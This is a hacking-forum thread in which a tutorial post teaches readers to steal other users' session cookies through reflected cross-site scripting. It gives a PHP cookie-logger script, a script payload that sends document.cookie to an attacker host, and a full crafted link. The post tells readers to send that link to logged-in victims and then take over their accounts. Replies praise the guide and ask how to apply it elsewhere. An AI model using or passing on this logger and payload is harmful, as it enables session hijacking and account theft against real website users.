file access auditing
+ Reply to Thread
Results 1 to 5 of 5

Thread: Moonbat's Guide to Cookie Stealing

  1. #1
    Join Date
    Sep 2006
    Posts
    1,649

    Moonbat's Guide to Cookie Stealing

    First off, props to Kr*w from TheDefaced for his code that I will use in the tutorial. I could code my own, but why bother?

    Okay, before we can start putting our hands in the cookie jar, we must learn about cross-site scripting, usually abbreviated as XSS.

    XSS is possible because of insecure coding by a coder. By giving us a means to interact with a site (such as a search box, or posting a comment) and not securing it, they leave it vulnerable to code injection. Let's give an example first, then I'll explain. Here is an example site:
    Code:
    http://current.com
    
    Note: I don't really enjoy leaving live links, so I code mine :P
    Now, we see that this site has a search box. Normally this search box is meant to handle normal queries, but lets see what happens when we try to inject some code. Type the following into the search box: <script>alert("VULNERABLE")</script>.

    Now when you search for it, you'll see an alert box pop up with the word 'VULNERABLE' in it. This means the search box is vulnerable to code injection, and is vulnerable to XSS. Now here's why it works.

    If you check the source code of the web page, you'll see that the our query (the injection code) was directly echoed into the source, without filteration. Normally, this is okay because most search queries are normal words, but since it echoed our script directly into the source, our browser interprets it as if that script was a part of the overall webpage, and therefore executed it. Now normally, who cares if I can echo little alert boxes, right? Wrong. Especially because this site has a user database that can be compromised

    The script I executed was a simple block of JavaScript. Read more about JavaScript here.
    Code:
    http://www.w*schools.com/js/default.asp
    There are a variety of ways to use XSS to grab cookies, I'll go over one.

    Now, suppose we're gonna do an XSS attack on the site I posted at the begining. We need to have a place to store the cookies we get, so lets get some quick webhosting. We will need to make two files on our site, a text file, and a PHP file. Let's pretend our site is poopsey.com. Now, we make a file called log.php and put the following code in:
    Code:
    <?php
    /*
    ** Kr*w's Cookie Logger
    ** www.thedefaced.org
    */
    
    $ip = $_SERVER['REMOTE_ADDR'];
    $cookie = $_GET['cookie'];
    $referer = $_SERVER['HTTP_REFERER'];
    $browser = $_SERVER['HTTP_USER_AGENT'];
    $redirect = $_GET['redirect'];
    
    $data = "IP: " . $ip . "\n"
    ."Cookie: " . $cookie . "\n"
    ."Referrer: " . $referer . "\n"
    ."Browser: " . $browser . "\n\n";
    
    $log = "cookies.txt";
    @chmod($log, 0777);
    
    $f = fopen($log, 'a');
    fwrite($f, $data);
    fclose($f);
    
    @header("Location: $redirect");
    
    ?>
    This is some PHP code that will write the some information about the victim, such as the IP, browser, etc. along with the cookie into the second file we will make, called cookies.txt. Just make a text file called cookies.txt and leave it empty. I could go in depth with exactly what all this code means, but it's better if you read up on PHP yourself, I can't spoon-feed everything you know. You can read up on PHP here.
    Code:
    http://www.w*schools.com/php/default.asp
    Now comes the fun part. We don't need our own cookies, we need other users' cookies. So we look at the first ever XSS vulnerability check we did on current.com. Look at it.
    Code:
    http://current.com/search/search.do?indexName=barca-search&renderer=jsp&q=%*Cscript%*Ealert%28%22VULNERABLE%22%2*%*C%2Fscript%*E&x=0&y=0
    The part I bolded (%*Cscript%*Ealert%28%22VULNERABLE%22%2*%*C%2Fscript%*E) is the code that we had entered (<script>alert("VULNERABLE")</script>). We replace this code with the following code:
    Code:
    <script>document.location="http://poopsey.com/log.php?cookie="+document.cookie+"&redirect=http://current.com";</script>
    Now the final URL looks like:
    Code:
    http://current.com/search/search.do?indexName=barca-search&renderer=jsp&q=<script>document.location="http://poopsey.com/log.php?cookie="+document.cookie+"&redirect=http://current.com";</script>&x=0&y=0
    Now send this link to someone logged into the current.com site. When they click this link, it will take them to poopsey.com/log.php, write all their info, then redirect them back to current.com. Now all you have to do is take the victim's cookie and replace your own cookie with the victim's cookie. Then you have access to the victim's account for some time, usually until the login session expires.

    Now that I think about it, I never explained exactly what a cookie was, or how to replace your cookies with the victim's. Oh well, I guess that means someone has to go Googling and pursue the information themselves

    Thanks for reading, and I hope you learned something
    -Moonbat
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

  2. #2
    Join Date
    Sep 2006
    Posts
    4

    awsome

    great tut */*0 ( lol because of the search it your self ) pretty cool though gotta try it too lol

  3. #3
    Join Date
    Jun 2011
    Posts
    1

    Question Great Work!!!

    well itz quite useful tut. but wat if we dnt hav any xss vuln. in the site of which we wanna get cookies? how to apply this thingy there?? plzz hlp me out...

  4. #4
    Join Date
    Apr 2015
    Posts
    110
    I find this post to be helpful but what is the goal of persons who steal cookies? What can cookies do by the way?

  5. #5
    Join Date
    Apr 2007
    Posts
    922
    Quote Originally Posted by mat* View Post
    I find this post to be helpful but what is the goal of persons who steal cookies? What can cookies do by the way?
    https://en.wikipedia.org/wiki/Session_hijacking

    http://www.troyhunt.com/20**/0*/c-is-for-cookie-h-is-for-hacker.html

+ Reply to Thread

Similar Threads

  1. Moonbat's Guide to Getting a Job
    By Moonbat in forum Tutorials
    Replies: 13
    Last Post: 12-18-2019, 09:49 AM
  2. Moonbat's Guide to SQL Injections
    By Moonbat in forum Tutorials
    Replies: 6
    Last Post: 01-04-2008, 02:08 PM
  3. Cookie stealing
    By whizzlechiz in forum Internet Privacy
    Replies: 12
    Last Post: 02-11-2007, 11:26 PM
  4. Moonbat's Guide to SQL Injections
    By Moonbat in forum Internet Privacy
    Replies: 4
    Last Post: 11-14-2006, 08:37 AM
  5. php cookie stealing script
    By carlo in forum Internet Privacy
    Replies: 0
    Last Post: 08-14-2005, 02:35 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts